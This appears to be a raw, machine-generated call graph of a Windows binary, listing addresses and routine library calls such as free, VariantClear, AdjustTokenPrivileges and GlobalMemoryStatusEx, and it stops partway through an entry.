71bfd0 74978 6d1e40 free 74959->74978 74961 71bfdb 74979 6d1e40 free 74961->74979 74963 71bfe6 74980 71c072 free ctype 74963->74980 74965 71bff4 74981 6eaafa free VariantClear ctype 74965->74981 74967 71c023 74982 6f73d2 free VariantClear __EH_prolog ctype 74967->74982 74969 71bf7f 74970 6d1e40 free 74969->74970 74970->74950 74973 71d14e __EH_prolog 74971->74973 74983 71d1b7 74973->74983 74976 71bfc5 74977 6d1e40 free 74976->74977 74977->74959 74978->74961 74979->74963 74980->74965 74981->74967 74982->74969 74991 71d23c 74983->74991 74985 71d1ed 74998 6d1e40 free 74985->74998 74987 71d209 74999 6d1e40 free 74987->74999 74989 71d180 74990 718e04 memset 74989->74990 74990->74976 75000 71d2b8 74991->75000 74996 71d275 74996->74985 74997 71d25e 75017 6d1e40 free 74997->75017 74998->74987 74999->74989 75019 6d1e40 free 75000->75019 75002 71d2c8 75020 6d1e40 free 75002->75020 75004 71d2dc 75021 6d1e40 free 75004->75021 75006 71d2e7 75022 6d1e40 free 75006->75022 75008 71d2f2 75023 6d1e40 free 75008->75023 75010 71d2fd 75024 6d1e40 free 75010->75024 75012 71d308 75025 6d1e40 free 75012->75025 75014 71d313 75015 71d246 75014->75015 75026 6d1e40 free 75014->75026 75015->74997 75018 6d1e40 free 75015->75018 75017->74996 75018->74997 75019->75002 75020->75004 75021->75006 75022->75008 75023->75010 75024->75012 75025->75014 75026->75015 75027 767da0 WaitForSingleObject 75028 767dc1 75027->75028 75029 767dbb GetLastError 75027->75029 75030 767dce CloseHandle 75028->75030 75031 767ddf 75028->75031 75029->75028 75030->75031 75032 767dd9 GetLastError 75030->75032 75032->75031 75033 756ba3 VirtualFree 75034 70a42c 75035 70a435 fputs 75034->75035 75036 70a449 75034->75036 75192 6d1fa0 fputc 75035->75192 75193 70545d 75036->75193 75040 6d2e04 2 API calls 75041 70a4a1 75040->75041 75197 6f1858 75041->75197 75043 70a4c9 75259 6d1e40 free 75043->75259 75045 70a4d8 75046 70a4ee 75045->75046 75048 70c7d7 ctype 6 API calls 75045->75048 75047 70a50e 75046->75047 75260 7057fb 75046->75260 75270 70c73e 75047->75270 75048->75046 75053 70ac17 75426 702db9 free ctype 75053->75426 75054 6d1e0c ctype 2 API calls 75056 70a53a 75054->75056 75058 70a54d 75056->75058 75396 70b0fa malloc _CxxThrowException __EH_prolog 75056->75396 75057 70ac23 75059 70ac3a 75057->75059 75061 70ac35 75057->75061 75065 6d2fec 3 API calls 75058->75065 75428 70b96d _CxxThrowException 75059->75428 75427 70b988 33 API calls __aulldiv 75061->75427 75064 70ac42 75429 6d1e40 free 75064->75429 75069 70a586 75065->75069 75067 70ac4d 75068 6f3247 free 75067->75068 75070 70ac5d 75068->75070 75288 70ad06 75069->75288 75430 6d1e40 free 75070->75430 75074 70ac7d 75431 6d11c2 free __EH_prolog ctype 75074->75431 75078 70ac89 75079 6e3a29 5 API calls 75081 70a62e 75079->75081 75083 6d2e04 2 API calls 75081->75083 75171 70aae5 75425 702db9 free ctype 75171->75425 75192->75036 75194 705473 75193->75194 75195 705466 75193->75195 75194->75040 75434 6d275e malloc _CxxThrowException free ctype 75195->75434 75198 6f1862 __EH_prolog 75197->75198 75435 6f021a 75198->75435 75203 6f18b9 75449 6f1aa5 free __EH_prolog ctype 75203->75449 75204 6f1935 75454 6f1aa5 free __EH_prolog ctype 75204->75454 75207 6f18c7 75450 702db9 free ctype 75207->75450 75208 6f1944 75230 6f1966 75208->75230 75455 6f1d73 5 API calls __EH_prolog 75208->75455 75211 6f18d3 75211->75043 75213 7104d2 5 API calls 75219 6f18db 75213->75219 75214 6f1958 _CxxThrowException 75214->75230 75215 6f19be 75462 6ff1f1 malloc _CxxThrowException free _CxxThrowException 75215->75462 75218 6d2e04 2 API calls 75218->75230 75219->75204 75219->75213 75451 6f0144 malloc _CxxThrowException free _CxxThrowException 75219->75451 75452 6d1524 malloc _CxxThrowException __EH_prolog ctype 75219->75452 75453 6d1e40 free 75219->75453 75220 6f19d6 75222 6f7ebb free 75220->75222 75224 6f19e1 75222->75224 75225 6e12d4 4 API calls 75224->75225 75227 6f19ea 75225->75227 75226 7104d2 5 API calls 75226->75230 75228 6f7ebb free 75227->75228 75231 6f19f7 75228->75231 75230->75215 75230->75218 75230->75226 75456 6d631f 75230->75456 75460 6d1524 malloc _CxxThrowException __EH_prolog ctype 75230->75460 75461 6d1e40 free 75230->75461 75233 6e12d4 4 API calls 75231->75233 75240 6f19ff 75233->75240 75234 6f1a4f 75464 6d1e40 free 75234->75464 75236 6d1524 malloc _CxxThrowException 75236->75240 75237 6f1a57 75465 702db9 free ctype 75237->75465 75239 6f1a64 75466 702db9 free ctype 75239->75466 75240->75234 75240->75236 75243 6f1a83 75240->75243 75463 6d42e3 CharUpperW 75240->75463 75467 6f1d73 5 API calls __EH_prolog 75243->75467 75245 6f1a97 _CxxThrowException 75246 6f1aa5 __EH_prolog 75245->75246 75468 6d1e40 free 75246->75468 75248 6f1ac8 75469 6f02e8 free ctype 75248->75469 75250 6f1ad1 75470 6f1eab free __EH_prolog ctype 75250->75470 75252 6f1add 75471 6d1e40 free 75252->75471 75254 6f1ae5 75472 6d1e40 free 75254->75472 75256 6f1aed 75473 702db9 free ctype 75256->75473 75258 6f1afa 75258->75043 75259->75045 75261 705805 __EH_prolog 75260->75261 75262 705847 75261->75262 75263 6d26dd 2 API calls 75261->75263 75262->75047 75264 705819 75263->75264 75653 705678 75264->75653 75268 70583f 75670 6d1e40 free 75268->75670 75271 70c748 __EH_prolog 75270->75271 75272 70c7d7 ctype 6 API calls 75271->75272 75273 70c75d 75272->75273 75687 6d1e40 free 75273->75687 75275 70c768 75688 6f2c0b 75275->75688 75279 70c77d 75694 6d1e40 free 75279->75694 75281 70c785 75695 6d1e40 free 75281->75695 75283 70c78d 75696 6d1e40 free 75283->75696 75285 70c795 75286 6f2c0b ctype free 75285->75286 75287 70a51d 75286->75287 75287->75054 75287->75171 75289 70ad29 2 API calls 75288->75289 75290 70a5d8 75289->75290 75291 70bf3e 75290->75291 75292 6d2fec 3 API calls 75291->75292 75293 70bf85 75292->75293 75294 6d2fec 3 API calls 75293->75294 75295 70a5ee 75294->75295 75295->75079 75396->75058 75425->75053 75426->75057 75427->75059 75428->75064 75429->75067 75430->75074 75431->75078 75434->75194 75436 6f0224 __EH_prolog 75435->75436 75474 6e3d66 75436->75474 75439 6f062e 75445 6f0638 __EH_prolog 75439->75445 75440 6f06de 75561 6f019a malloc _CxxThrowException free memcpy 75440->75561 75442 6f06e6 75562 6f1453 26 API calls 2 library calls 75442->75562 75443 6f01bc malloc _CxxThrowException free _CxxThrowException memcpy 75443->75445 75445->75440 75445->75443 75448 6f06ee 75445->75448 75490 6f0703 75445->75490 75560 702db9 free ctype 75445->75560 75448->75203 75448->75219 75449->75207 75450->75211 75451->75219 75452->75219 75453->75219 75454->75208 75455->75214 75457 6d9245 75456->75457 75601 6d90da 75457->75601 75460->75230 75461->75230 75462->75220 75463->75240 75464->75237 75465->75239 75466->75211 75467->75245 75468->75248 75469->75250 75470->75252 75471->75254 75472->75256 75473->75258 75485 76fb10 75474->75485 75476 6e3d70 GetCurrentProcess 75486 6e3e04 75476->75486 75478 6e3d8d OpenProcessToken 75479 6e3d9e LookupPrivilegeValueW 75478->75479 75480 6e3de3 75478->75480 75479->75480 75481 6e3dc0 AdjustTokenPrivileges 75479->75481 75482 6e3e04 CloseHandle 75480->75482 75481->75480 75483 6e3dd5 GetLastError 75481->75483 75484 6e3def 75482->75484 75483->75480 75484->75439 75485->75476 75487 6e3e0d 75486->75487 75488 6e3e11 CloseHandle 75486->75488 75487->75478 75489 6e3e21 75488->75489 75489->75478 75512 6f070d __EH_prolog 75490->75512 75491 6f0e1d 75598 6f0416 18 API calls 2 library calls 75491->75598 75493 6f0ea6 75600 71ec78 free ctype 75493->75600 75494 6f0d11 75592 6d7496 7 API calls 2 library calls 75494->75592 75497 6f0c13 75589 6d1e40 free 75497->75589 75499 6d2da9 2 API calls 75499->75512 75501 6f0c83 75501->75491 75501->75494 75502 6f0b40 75502->75445 75503 6f0de0 75594 702db9 free ctype 75503->75594 75504 6d2da9 2 API calls 75508 6f0ab5 75504->75508 75505 6f0e47 75505->75493 75599 6f117d 68 API calls 2 library calls 75505->75599 75506 6d2f1c 2 API calls 75515 6f0d29 75506->75515 75508->75497 75508->75504 75511 6d2e04 2 API calls 75508->75511 75525 6d2fec 3 API calls 75508->75525 75529 6f050b 44 API calls 75508->75529 75538 6f0c79 75508->75538 75545 6d1e40 free ctype 75508->75545 75580 6d2f4a malloc _CxxThrowException free ctype 75508->75580 75585 6d1089 malloc _CxxThrowException free _CxxThrowException 75508->75585 75586 6f13eb 5 API calls 2 library calls 75508->75586 75587 6f0ef4 68 API calls 2 library calls 75508->75587 75588 702db9 free ctype 75508->75588 75590 6f0021 GetLastError 75508->75590 75510 6d2e04 2 API calls 75510->75512 75511->75508 75512->75499 75512->75501 75512->75502 75512->75508 75512->75510 75520 6d2fec 3 API calls 75512->75520 75532 6f0b26 75512->75532 75547 702db9 free ctype 75512->75547 75552 7104d2 malloc _CxxThrowException free _CxxThrowException memcpy 75512->75552 75555 6f0b48 75512->75555 75557 6d1524 malloc _CxxThrowException 75512->75557 75558 6d1e40 free ctype 75512->75558 75563 6d2f4a malloc _CxxThrowException free ctype 75512->75563 75564 6d1089 malloc _CxxThrowException free _CxxThrowException 75512->75564 75565 6f13eb 5 API calls 2 library calls 75512->75565 75566 6f050b 75512->75566 75571 6f0021 GetLastError 75512->75571 75572 6d49bd 9 API calls 2 library calls 75512->75572 75573 6f0306 12 API calls 75512->75573 75574 6eff00 5 API calls 2 library calls 75512->75574 75575 6f057d 16 API calls 2 library calls 75512->75575 75576 6f0f8e 24 API calls 2 library calls 75512->75576 75577 6d472e CharUpperW 75512->75577 75578 6e8984 malloc _CxxThrowException free _CxxThrowException memcpy 75512->75578 75579 6f0ef4 68 API calls 2 library calls 75512->75579 75515->75503 75515->75506 75518 6d2e04 2 API calls 75515->75518 75524 6d2fec 3 API calls 75515->75524 75531 6f0df3 75515->75531 75535 6f0df8 75515->75535 75537 6d1e40 free ctype 75515->75537 75593 6f117d 68 API calls 2 library calls 75515->75593 75516 6f0e02 75597 702db9 free ctype 75516->75597 75518->75515 75520->75512 75524->75515 75525->75508 75529->75508 75595 6d1e40 free 75531->75595 75581 6d1e40 free 75532->75581 75596 6d1e40 free 75535->75596 75537->75515 75591 6d1e40 free 75538->75591 75539 6f0b30 75582 6d1e40 free 75539->75582 75543 6f0b38 75583 6d1e40 free 75543->75583 75545->75508 75547->75512 75552->75512 75584 702db9 free ctype 75555->75584 75557->75512 75558->75512 75560->75445 75561->75442 75562->75448 75563->75512 75564->75512 75565->75512 75567 6d6c72 44 API calls 75566->75567 75568 6f051e 75567->75568 75569 6f0575 75568->75569 75570 6d2f88 3 API calls 75568->75570 75569->75512 75570->75569 75571->75512 75572->75512 75573->75512 75574->75512 75575->75512 75576->75512 75577->75512 75578->75512 75579->75512 75580->75508 75581->75539 75582->75543 75583->75502 75584->75532 75585->75508 75586->75508 75587->75508 75588->75508 75589->75502 75590->75508 75591->75501 75592->75515 75593->75515 75594->75502 75595->75535 75596->75516 75597->75502 75598->75505 75599->75505 75600->75502 75602 6d90e4 __EH_prolog 75601->75602 75603 6d2f88 3 API calls 75602->75603 75605 6d90f7 75603->75605 75604 6d915d 75606 6d2e04 2 API calls 75604->75606 75605->75604 75610 6d9109 75605->75610 75607 6d9165 75606->75607 75608 6d91be 75607->75608 75611 6d9174 75607->75611 75647 6d6332 6 API calls 2 library calls 75608->75647 75613 6d2e47 2 API calls 75610->75613 75619 6d9155 75610->75619 75614 6d2f88 3 API calls 75611->75614 75612 6d917d 75640 6d91ca 75612->75640 75645 6d859e malloc _CxxThrowException free _CxxThrowException 75612->75645 75615 6d9122 75613->75615 75614->75612 75642 6d8f57 memmove 75615->75642 75619->75230 75620 6d914d 75644 6d1e40 free 75620->75644 75621 6d912e 75621->75620 75643 6d31e5 malloc _CxxThrowException free _CxxThrowException 75621->75643 75622 6d9185 75625 6d2e04 2 API calls 75622->75625 75626 6d9197 75625->75626 75627 6d919f 75626->75627 75628 6d91ce 75626->75628 75629 6d91b9 75627->75629 75646 6d1089 malloc _CxxThrowException free _CxxThrowException 75627->75646 75630 6d2f88 3 API calls 75628->75630 75648 6d3199 malloc _CxxThrowException free _CxxThrowException 75629->75648 75630->75629 75633 6d91e6 75649 6d8f57 memmove 75633->75649 75635 6d91ee 75636 6d91f2 75635->75636 75637 6d2fec 3 API calls 75635->75637 75651 6d1e40 free 75636->75651 75639 6d9212 75637->75639 75650 6d31e5 malloc _CxxThrowException free _CxxThrowException 75639->75650 75652 6d1e40 free 75640->75652 75642->75621 75643->75620 75644->75619 75645->75622 75646->75629 75647->75612 75648->75633 75649->75635 75650->75636 75651->75640 75652->75619 75654 7056b1 75653->75654 75655 705689 75653->75655 75671 705593 75654->75671 75657 705593 6 API calls 75655->75657 75659 7056a5 75657->75659 75661 6d28a1 5 API calls 75659->75661 75661->75654 75663 70570e fputs 75669 6d1fa0 fputc 75663->75669 75665 7056ef 75666 705593 6 API calls 75665->75666 75667 705701 75666->75667 75668 705711 6 API calls 75667->75668 75668->75663 75669->75268 75670->75262 75672 7055ad 75671->75672 75673 6d28a1 5 API calls 75672->75673 75674 7055b8 75673->75674 75675 6d286d 5 API calls 75674->75675 75676 7055bf 75675->75676 75677 6d28a1 5 API calls 75676->75677 75678 7055c7 75677->75678 75679 705711 75678->75679 75680 705721 75679->75680 75681 7056e0 75679->75681 75682 6d28a1 5 API calls 75680->75682 75681->75663 75685 6d2881 malloc _CxxThrowException free memcpy _CxxThrowException 75681->75685 75683 70572b 75682->75683 75686 7055cd 6 API calls 75683->75686 75685->75665 75686->75681 75687->75275 75697 6d1e40 free 75688->75697 75690 6f2c16 75698 6d1e40 free 75690->75698 75692 6f2c1e 75693 6d1e40 free 75692->75693 75693->75279 75694->75281 75695->75283 75696->75285 75697->75690 75698->75692 76521 70acd3 76522 70ace0 76521->76522 76526 70acf1 76521->76526 76522->76526 76527 70acf8 76522->76527 76532 70c0b3 __EH_prolog 76527->76532 76528 70c0ed 76536 6d1e40 free 76528->76536 76530 70aceb 76534 6d1e40 free 76530->76534 76531 6f7193 free 76531->76532 76532->76528 76532->76531 76535 6d1e40 free 76532->76535 76534->76526 76535->76532 76536->76530 76537 74f190 76538 6d1e0c ctype 2 API calls 76537->76538 76539 74f1b0 76538->76539 76541 7569d0 76542 7569d4 76541->76542 76543 7569d7 malloc 76541->76543 76544 6fd948 76574 6fdac7 76544->76574 76546 6fd94f 76547 6d2e04 2 API calls 76546->76547 76548 6fd97b 76547->76548 76549 6d2e04 2 API calls 76548->76549 76550 6fd987 76549->76550 76554 6fd9e7 76550->76554 76582 6d6404 76550->76582 76555 6fda0f 76554->76555 76556 6fda36 76554->76556 76607 6d1e40 free 76555->76607 76560 6fda94 76556->76560 76567 6d2da9 2 API calls 76556->76567 76571 7104d2 5 API calls 76556->76571 76609 6d1524 malloc _CxxThrowException __EH_prolog ctype 76556->76609 76610 6d1e40 free 76556->76610 76559 6fd9bf 76605 6d1e40 free 76559->76605 76611 6d1e40 free 76560->76611 76561 6fda17 76608 6d1e40 free 76561->76608 76565 6fd9c7 76606 6d1e40 free 76565->76606 76566 6fda9c 76612 6d1e40 free 76566->76612 76567->76556 76570 6fd9cf 76571->76556 76575 6fdad1 __EH_prolog 76574->76575 76576 6d2e04 2 API calls 76575->76576 76577 6fdb33 76576->76577 76578 6d2e04 2 API calls 76577->76578 76579 6fdb3f 76578->76579 76580 6d2e04 2 API calls 76579->76580 76581 6fdb55 76580->76581 76581->76546 76583 6d631f 9 API calls 76582->76583 76584 6d6414 76583->76584 76585 6d6423 76584->76585 76586 6d2f88 3 API calls 76584->76586 76587 6d2f88 3 API calls 76585->76587 76586->76585 76588 6d643d 76587->76588 76589 6e7e5a 76588->76589 76590 6e7e64 __EH_prolog 76589->76590 76613 6e8179 76590->76613 76593 6f7ebb free 76594 6e7e7f 76593->76594 76595 6d2fec 3 API calls 76594->76595 76596 6e7e9a 76595->76596 76597 6d2da9 2 API calls 76596->76597 76598 6e7ea7 76597->76598 76599 6d6c72 44 API calls 76598->76599 76600 6e7eb7 76599->76600 76618 6d1e40 free 76600->76618 76602 6e7ecb 76603 6e7ed8 76602->76603 76619 6d757d GetLastError 76602->76619 76603->76554 76603->76559 76605->76565 76606->76570 76607->76561 76608->76570 76609->76556 76610->76556 76611->76566 76612->76570 76617 6e8906 76613->76617 76614 6e7e77 76614->76593 76617->76614 76620 6e8804 free ctype 76617->76620 76621 6d1e40 free 76617->76621 76618->76602 76619->76603 76620->76617 76621->76617 76622 6db144 76623 6db153 76622->76623 76625 6db159 76622->76625 76624 6e11b4 107 API calls 76623->76624 76624->76625 76626 6fa7c5 76634 6fa96b 76626->76634 76637 6fa7e9 76626->76637 76627 6fade3 76731 6d1e40 free 76627->76731 76628 6fa952 76628->76634 76712 6fe0b0 6 API calls 76628->76712 76630 6fadeb 76732 6d1e40 free 76630->76732 76634->76627 76636 6fac1e 76634->76636 76660 6fac6c 76634->76660 76673 6fad88 76634->76673 76677 6fad17 76634->76677 76679 6facbc 76634->76679 76693 6e101c 76634->76693 76696 6f98f2 76634->76696 76702 6fcc6f 76634->76702 76713 6f9531 5 API calls __EH_prolog 76634->76713 76714 6f80c1 malloc _CxxThrowException __EH_prolog 76634->76714 76715 6fc820 5 API calls 2 library calls 76634->76715 76716 6f814d 6 API calls 76634->76716 76717 6f8125 free ctype 76634->76717 76635 6fae99 76639 6d1e0c ctype 2 API calls 76635->76639 76718 6d1e40 free 76636->76718 76637->76628 76653 7104d2 5 API calls 76637->76653 76711 6fe0b0 6 API calls 76637->76711 76638 7104d2 malloc _CxxThrowException free _CxxThrowException memcpy 76642 6fadf3 76638->76642 76643 6faea9 memset memset 76639->76643 76642->76635 76642->76638 76645 6faedd 76643->76645 76644 6fac26 76719 6d1e40 free 76644->76719 76733 6d1e40 free 76645->76733 76648 6fac2e 76736 6d1e40 free 76648->76736 76651 6faee5 76734 6d1e40 free 76651->76734 76653->76637 76654 6faef0 76735 6d1e40 free 76654->76735 76658 6fc430 76737 6d1e40 free 76658->76737 76720 6d1e40 free 76660->76720 76661 6fc438 76738 6d1e40 free 76661->76738 76665 6fc443 76739 6d1e40 free 76665->76739 76667 6fac85 76721 6d1e40 free 76667->76721 76669 6fc44e 76740 6d1e40 free 76669->76740 76671 6fc459 76728 6f8125 free ctype 76673->76728 76725 6f8125 free ctype 76677->76725 76678 6fad93 76729 6d1e40 free 76678->76729 76722 6f8125 free ctype 76679->76722 76683 6fadac 76730 6d1e40 free 76683->76730 76684 6facc7 76723 6d1e40 free 76684->76723 76685 6fad3c 76726 6d1e40 free 76685->76726 76689 6fad55 76727 6d1e40 free 76689->76727 76690 6face0 76724 6d1e40 free 76690->76724 76695 6db95a 6 API calls 76693->76695 76694 6e1028 76694->76634 76695->76694 76697 6f98fc __EH_prolog 76696->76697 76741 6f9987 76697->76741 76699 6f9970 76699->76634 76700 6f9911 76700->76699 76745 6fef8d 12 API calls 2 library calls 76700->76745 76785 71f445 76702->76785 76791 715505 76702->76791 76795 71cf91 76702->76795 76703 6fcccb 76703->76634 76704 6fcc8b 76704->76703 76803 6f979e VariantClear __EH_prolog 76704->76803 76706 6fccb1 76706->76703 76804 6fcae9 VariantClear 76706->76804 76711->76637 76712->76634 76713->76634 76714->76634 76715->76634 76716->76634 76717->76634 76718->76644 76719->76648 76720->76667 76721->76648 76722->76684 76723->76690 76724->76648 76725->76685 76726->76689 76727->76648 76728->76678 76729->76683 76730->76648 76731->76630 76732->76642 76733->76651 76734->76654 76735->76648 76736->76658 76737->76661 76738->76665 76739->76669 76740->76671 76742 6f9991 __EH_prolog 76741->76742 76746 7280aa 76742->76746 76743 6f99a8 76743->76700 76745->76699 76747 7280b4 __EH_prolog 76746->76747 76748 6d1e0c ctype 2 API calls 76747->76748 76750 7280bf 76748->76750 76749 7280d3 76749->76743 76750->76749 76752 71bdb5 76750->76752 76753 71bdbf __EH_prolog 76752->76753 76758 71be69 76753->76758 76755 71bdef 76756 6d2e04 2 API calls 76755->76756 76757 71be16 76756->76757 76757->76749 76759 71be73 __EH_prolog 76758->76759 76762 715e2b 76759->76762 76761 71be7f 76761->76755 76763 715e35 __EH_prolog 76762->76763 76768 7108b6 76763->76768 76765 715e41 76773 6edfc9 malloc _CxxThrowException __EH_prolog 76765->76773 76767 715e57 76767->76761 76774 6d9c60 76768->76774 76770 7108c4 76779 6d9c8f GetModuleHandleA GetProcAddress 76770->76779 76772 7108f3 __aulldiv 76772->76765 76773->76767 76784 6d9c4d GetCurrentProcess GetProcessAffinityMask 76774->76784 76776 6d9c6e 76777 6d9c80 GetSystemInfo 76776->76777 76778 6d9c79 76776->76778 76777->76770 76778->76770 76780 6d9cef GlobalMemoryStatus 76779->76780 76781 6d9cc4 GlobalMemoryStatusEx 76779->76781 76782 6d9d08 76780->76782 76781->76780 76783 6d9cce 76781->76783 76782->76783 76783->76772 76784->76776 76786 71f455 76785->76786 76805 6e1092 76786->76805 76789 71f478 76789->76704 76792 71550f __EH_prolog 76791->76792 76821 714e8a 76792->76821 76796 71cf9b __EH_prolog 76795->76796 76797 71f445 14 API calls 76796->76797 76798 71d018 76797->76798 76801 71d01f 76798->76801 77037 721511 76798->77037 76800 71d08b 76800->76801 77043 722c5d 11 API calls 2 library calls 76800->77043 76801->76704 76803->76706 76804->76703 76807 6db95a 6 API calls 76805->76807 76806 6e10aa 76806->76789 76808 71f1b2 76806->76808 76807->76806 76809 71f1bc __EH_prolog 76808->76809 76818 6e1168 76809->76818 76811 71f1e6 76811->76789 76812 71f1d3 76812->76811 76813 71f231 memcpy 76812->76813 76814 71f21c _CxxThrowException 76812->76814 76817 71f24c 76813->76817 76814->76813 76815 71f2f0 memmove 76815->76817 76816 71f31a memcpy 76816->76811 76817->76811 76817->76815 76817->76816 76819 6e111c 10 API calls 76818->76819 76820 6e117b 76819->76820 76820->76812 76822 714e94 __EH_prolog 76821->76822 76823 6d2e04 2 API calls 76822->76823 76839 714f1d 76822->76839 76824 714ed7 76823->76824 76953 6e7fc5 76824->76953 76826 714f37 76828 714f41 76826->76828 76829 714f63 76826->76829 76827 714f0a 76830 6d965d VariantClear 76827->76830 76831 6d965d VariantClear 76828->76831 76832 6d2f88 3 API calls 76829->76832 76833 714f15 76830->76833 76834 714f4c 76831->76834 76835 714f71 76832->76835 76974 6d1e40 free 76833->76974 76975 6d1e40 free 76834->76975 76838 6d965d VariantClear 76835->76838 76840 714f80 76838->76840 76839->76704 76976 6e5bcf malloc _CxxThrowException 76840->76976 76842 714f9a 76843 6d2e47 2 API calls 76842->76843 76844 714fad 76843->76844 76845 6d2f1c 2 API calls 76844->76845 76846 714fbd 76845->76846 76847 6d2e04 2 API calls 76846->76847 76848 714fd1 76847->76848 76849 6d2e04 2 API calls 76848->76849 76855 714fdd 76849->76855 76850 715404 77015 6d1e40 free 76850->77015 76852 71540c 77016 6d1e40 free 76852->77016 76854 715414 77017 6d1e40 free 76854->77017 76855->76850 76977 6e5bcf malloc _CxxThrowException 76855->76977 76858 715099 76860 6d2da9 2 API calls 76858->76860 76859 71541c 77018 6d1e40 free 76859->77018 76862 7150a9 76860->76862 76864 6d2fec 3 API calls 76862->76864 76863 715424 77019 6d1e40 free 76863->77019 76866 7150b6 76864->76866 76978 6d1e40 free 76866->76978 76867 71542c 77020 6d1e40 free 76867->77020 76870 7150be 76979 6d1e40 free 76870->76979 76872 7150cd 76873 6d2f88 3 API calls 76872->76873 76874 7150e3 76873->76874 76875 7150f1 76874->76875 76876 715100 76874->76876 76878 6d30ea 3 API calls 76875->76878 76980 6d3044 malloc _CxxThrowException free ctype 76876->76980 76879 7150fe 76878->76879 76981 6e1029 6 API calls 76879->76981 76881 71511a 76882 715120 76881->76882 76883 71516b 76881->76883 76982 6d1e40 free 76882->76982 76988 6e089e malloc _CxxThrowException free _CxxThrowException memcpy 76883->76988 76886 715128 76983 6d1e40 free 76886->76983 76887 715187 76890 7104d2 5 API calls 76887->76890 76889 715130 76984 6d1e40 free 76889->76984 76892 7151ba 76890->76892 76989 710516 malloc _CxxThrowException ctype 76892->76989 76893 715138 76985 6d1e40 free 76893->76985 76896 7151c5 76901 7151f5 76896->76901 76902 71522d 76896->76902 76897 715140 76986 6d1e40 free 76897->76986 76899 715148 76987 6d1e40 free 76899->76987 76990 6d1e40 free 76901->76990 76903 6d2e04 2 API calls 76902->76903 76905 715235 76903->76905 76916 71532e 76905->76916 76919 7153a3 76905->76919 76935 7104d2 5 API calls 76905->76935 76951 6d2e04 2 API calls 76905->76951 76996 71545c 5 API calls 2 library calls 76905->76996 76997 6e1029 6 API calls 76905->76997 76998 6e089e malloc _CxxThrowException free _CxxThrowException memcpy 76905->76998 76999 710516 malloc _CxxThrowException ctype 76905->76999 77000 6d1e40 free 76905->77000 76906 7151fd 76991 6d1e40 free 76906->76991 76909 715205 76992 6d1e40 free 76909->76992 76912 71520d 76993 6d1e40 free 76912->76993 76913 715347 76913->76850 76915 715358 76913->76915 77002 6d1e40 free 76915->77002 77001 6d1e40 free 76916->77001 76917 715215 76994 6d1e40 free 76917->76994 77008 6d1e40 free 76919->77008 76921 715360 77003 6d1e40 free 76921->77003 76922 71521d 76926 715368 76929 7153bc 77009 6d1e40 free 76929->77009 76934 7153c4 77010 6d1e40 free 76934->77010 76935->76905 76938 7153cc 77011 6d1e40 free 76938->77011 76951->76905 76955 6e7fcf __EH_prolog 76953->76955 76954 6e7ff4 76965 6e800a 76954->76965 77021 6d950d 76954->77021 76955->76954 76956 6e8061 76955->76956 76958 6e8019 76955->76958 76961 6e805c 76955->76961 76956->76961 76971 6e8025 76956->76971 76958->76954 76962 6e801e 76958->76962 76960 6e80b8 76964 6d965d VariantClear 76960->76964 77029 6d9630 VariantClear 76961->77029 76966 6e8042 76962->76966 76967 6e8022 76962->76967 76969 6e80c0 76964->76969 77030 6d9736 VariantClear 76965->77030 77027 6d9597 VariantClear 76966->77027 76970 6e8032 76967->76970 76967->76971 76969->76826 76969->76827 77026 6d9604 VariantClear 76970->77026 76971->76965 77028 6d95df VariantClear 76971->77028 76974->76839 76975->76839 76976->76842 76977->76858 76978->76870 76979->76872 76980->76879 76981->76881 76982->76886 76983->76889 76984->76893 76985->76897 76986->76899 76987->76839 76988->76887 76989->76896 76990->76906 76991->76909 76992->76912 76993->76917 76994->76922 76996->76905 76997->76905 76998->76905 76999->76905 77000->76905 77001->76913 77002->76921 77003->76926 77008->76929 77009->76934 77010->76938 77015->76852 77016->76854 77017->76859 77018->76863 77019->76867 77020->76839 77031 6d9767 77021->77031 77023 6d9518 SysAllocStringLen 77024 6d954f 77023->77024 77025 6d9539 _CxxThrowException 77023->77025 77024->76965 77025->77024 77026->76965 77027->76965 77028->76965 77029->76965 77030->76960 77032 6d9779 77031->77032 77033 6d9770 77031->77033 77036 6d9686 VariantClear 77032->77036 77033->77023 77035 6d9780 77035->77023 77036->77035 77038 72151b __EH_prolog 77037->77038 77044 7210d3 77038->77044 77041 721552 _CxxThrowException 77041->76800 77042 721589 77042->76800 77043->76801 77045 7210dd __EH_prolog 77044->77045 77046 71d1b7 free 77045->77046 77047 7210f2 77046->77047 77048 7212ef 77047->77048 77049 7211f4 77047->77049 77052 6e1168 10 API calls 77047->77052 77048->77041 77048->77042 77049->77048 77075 6db95a 6 API calls 77049->77075 77050 72139e 77050->77048 77053 6d1e0c ctype 2 API calls 77050->77053 77054 7213c4 77050->77054 77051 6e1168 10 API calls 77055 7213da 77051->77055 77052->77049 77053->77054 77054->77051 77058 7213f9 77055->77058 77068 7213de 77055->77068 77111 71ef67 _CxxThrowException 77055->77111 77076 71f047 77058->77076 77061 7214ba 77115 720943 50 API calls 2 library calls 77061->77115 77062 721450 77080 7206ae 77062->77080 77066 7214e7 77116 702db9 free ctype 77066->77116 77117 6d1e40 free 77068->77117 77071 72148e 77072 71f047 _CxxThrowException 77071->77072 77073 7214ac 77072->77073 77073->77061 77114 71ef67 _CxxThrowException 77073->77114 77075->77050 77077 71f063 77076->77077 77078 71f072 77077->77078 77118 71ef67 _CxxThrowException 77077->77118 77078->77061 77078->77062 77112 71ef67 _CxxThrowException 77078->77112 77081 7206b8 __EH_prolog 77080->77081 77119 7203f4 77081->77119 77083 720877 77084 71b8dc ctype free 77083->77084 77086 7208a6 77084->77086 77085 6e12a5 5 API calls 77109 720715 77085->77109 77149 6d1e40 free 77086->77149 77087 7208e3 _CxxThrowException 77090 7208f7 77087->77090 77089 7208ae 77150 6d1e40 free 77089->77150 77093 71b8dc ctype free 77090->77093 77091 6d429a 3 API calls 77091->77109 77095 720914 77093->77095 77094 7208b6 77151 6d1e40 free 77094->77151 77153 6d1e40 free 77095->77153 77096 6d1e0c ctype 2 API calls 77096->77109 77099 7208be 77152 71c149 free ctype 77099->77152 77100 72091c 77154 6d1e40 free 77100->77154 77103 7208d0 77103->77066 77103->77071 77113 71ef67 _CxxThrowException 77103->77113 77104 720924 77155 6d1e40 free 77104->77155 77106 7181ec 29 API calls 77106->77109 77107 72092c 77156 71c149 free ctype 77107->77156 77109->77083 77109->77085 77109->77087 77109->77090 77109->77091 77109->77096 77109->77106 77110 71ef67 _CxxThrowException 77109->77110 77110->77109 77111->77058 77112->77062 77113->77071 77114->77061 77115->77066 77116->77068 77117->77048 77118->77078 77120 71f047 _CxxThrowException 77119->77120 77121 720407 77120->77121 77122 71f047 _CxxThrowException 77121->77122 77123 720475 77121->77123 77134 720421 77122->77134 77125 72049a 77123->77125 77160 